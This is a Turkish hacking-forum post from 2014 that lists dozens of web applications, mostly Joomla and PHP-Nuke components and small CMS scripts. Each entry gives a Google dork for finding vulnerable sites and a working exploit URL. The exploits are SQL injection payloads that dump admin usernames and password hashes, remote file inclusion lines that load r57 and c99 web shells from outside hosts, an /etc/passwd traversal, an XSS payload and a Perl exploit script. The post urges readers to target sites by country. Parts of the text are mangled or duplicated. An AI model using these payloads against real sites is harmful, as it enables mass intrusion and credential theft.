- 27 Nis 2014
- 4,596
- 69
PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : -'name Kose_Yazilari op viewarticle artid'-
Google arama : -'name Kose_Yazilari op printpage artid'-
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Com-Mtree Açığı
Google Arama : inurl:-/com_mtree/-
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Com-Lmo Açığı
Google Arama : "com_lmo"
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Com-Rsfiles Açığı
Google Arama : inurl:-/index.php?option=com_rsfiles"
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Com-Mambads Açığı
Google Arama : inurl:com_mambads
WebLosning Açığı
Dork : allinurl: "index2.php?id"
Exploide
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Powered By Linkspile Açığı
Dork : Powered By linkspile
The Realestate ****** Açığı
Dork : inurl:dpage.php?docID
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Dork: "Powered by Novus"
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
Google Dork: inurl:com_peoplebook
Exploid:
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
Exploits 2:
SoftbizScripts Açığı
Dork: "inurlowered by SoftbizScripts" veya "Subscribe Newsletter"
Exploit:
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/-
Exploit:
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat=-
Exploide:
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid:
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
Gamma Scripts Açığı
Dork : "BlogMe PHP created by Gamma Scripts"
Exploit :
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid -'catid'-
Dork 2 - content_by_cat.asp? -'catid'-
exploit-
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
NOT:
Google Arama : -'name Kose_Yazilari op viewarticle artid'-
Google arama : -'name Kose_Yazilari op printpage artid'-
Site sonuna : modules.php?name=-"KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: "inurl:/plugins/wordtube"
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Not: Html'den sonrasına kendi shell adresiniz gerekli.
Joomla" Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Com-Actualite Açığı
Google Arama : allinurl: "com_actualite"
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:-/com_mtree/-
Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?
Com-Lmo Açığı
Google Arama : "com_lmo"
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path.-/administrator/components/com_lmo/-;
$lmo_url=$mosConfig_live_site.-/administrator/components/com_lmo/-;
Com-PonyGallery Açığı
Google Arama : inurl:"index.php?option=com_ponygallery"
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:-/index.php?option=com_rsfiles"
Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*
Com-Joomlaradiov5
Google Arama : inurl:"com_joomlaradiov5"
Com-JoomlaFlashFun Açığı
Google Arama : "com_joomlaflashfun"
Site Sonuna : XXX.net: The Leading XXX Site on the Net[attacker]
Carousel Flash Image Açığı
Google Arama : inurl:"com_jjgallery
Site Sonuna : http://[taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
WebLosning Açığı
Dork : allinurl: "index2.php?id"
Exploide
1 http://www.target.dk/index2.php?id=-...brugernavn,adg angskode),4,5,6+from+web1_brugere/*
2 http://www.target.dk/index2.php?id=2...ugernavn,adgan gskode),3+from+web2_brugere/*
3 http://www.target.dk/index2.php?id=-...ugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*
4 http://www.target.dk/index2.php?id=-...ugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*
Powered By: MFH v1 Açığı
Dork: "Powered by: MFH v1"
Exploitation options:
ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users
ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info
ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)
W.G.C.C Açığı
Google Dork : "Web Group Communication Center"
Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C
Powered By Zomplog Açığı
Dork: "powered by zomplog"
Xcart Rfi Açığı
Google dork : "X-CART. Powerful PHP shopping cart software"
Exploit
site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?
Plugin-Class tabanlı Sistemlerde Açık
Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=
Exploide:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"
Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...
Powered By Linkspile Açığı
Dork : Powered By linkspile
Exploit :
http://www.example.com/link.php?cat_...x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*
The Realestate ****** Açığı
Dork : inurl:dpage.php?docID
Exploit : http://www.example.com/dpage.php?doc...Username,Passw ord)+from+admin
Calogic Calendars V1.2.2 Açığı
Dork : "CaLogic Calendars V1.2.2"
POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}
Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
Powered By PHPizabi Açığı
Dork: "Powered by PHPizabi v0.848b C1 HFP1"
AJ Auction 6.2.1 Açığı
DORK: inurl:"classifide_ad.php"
Powered By Novus AçığıExploide:
http://site.com/classifide_ad.php?it...assword),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
Dork: "Powered by Novus"
Com-Mgm Açığı
Google Dork: inurl:"com_mgm"
Exploide:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Loudmounth Açığı
Dork: inurl:com_loudmounth
Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Com-Thopper Açığı
Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper
Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
Com-Bsq-Sitestats Açığı
Google Dork: inurl:com_bsq_sitestats
Exploid:
Com-PeopleBook Açığı/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?
Google Dork: inurl:com_peoplebook
Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Joomla Component AstatsPRO Açığı
Dork: allinurl: "com_astatspro"
Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
WorkingOnWeb 2.0.1400 Açığı
Dork: Powered by WorkingOnWeb 2.0.1400
Exploide:
http://localhost/events.php?idevent=...ll,0,0,0,0,0,0, 0/**/from/**/mysql.user/*
Powered by cpDynaLinks Açığı
Dork: Powered by cpDynaLinks
connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
if(!$ARGV[0]) {
print -\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print -
written by ka0x - ka0x01[at]gmail.com\n";
print -
usage: perl $0 [host]\n";
print -
example: http://host.com/cpDynaLinks\n";
exit(1);
}
print -\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host.-/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*-);
if ($go->content =~ m/____(.*?)____/ms) {
print -$1\n";
} else {
print -\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]
Maplab-2.2 Açığı
Dorks:
index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/
Exploit:
Admidio 1.4.8 RFI Açığı
Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=
ezContents CMS Açığı
Dork: "ezContents CMS Version 2.0.0"
Exploits:
http://site.com/[patch]/showdetails.php?contentname=--/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
Exploits 2:
http://site.com/[patch]/printer.php?article=-/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*
SoftbizScripts Açığı
Dork: "inurlowered by SoftbizScripts" veya "Subscribe Newsletter"
Exploit:
http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--
****** Açığıdır...
ProfileCMS v1.0 Açığı
Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"
Exploit: http://target.com/index.php?app=prof...x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*
target.org a,password,0x3a,email),3,4,5,6%20from%20users/*
Target.net a,password,0x3a,email),3,4,5,6%20from%20users/*
Target.net 3737764),3,4,5,6%20from%20users/*
Com-Rsgallery Açığı
Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery
Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--
Admin nick vs hashları verir. Joomlada bulunan bir açıktır
Admin girişi: /administrator/
Kmita Tell Friend Açığı
Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/-
Exploit:
/kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : "allinurl:viewfaqs.php?cat=-
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Açığı
Dork: "allinurl:index.php?user=daysbooking"
Exploid:
index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : "BlogMe PHP created by Gamma Scripts"
Exploit :
veyahttp://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid -'catid'-
Dork 2 - content_by_cat.asp? -'catid'-
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username=-'sa'--
NOT:
İsteğe göre devamı gelecektir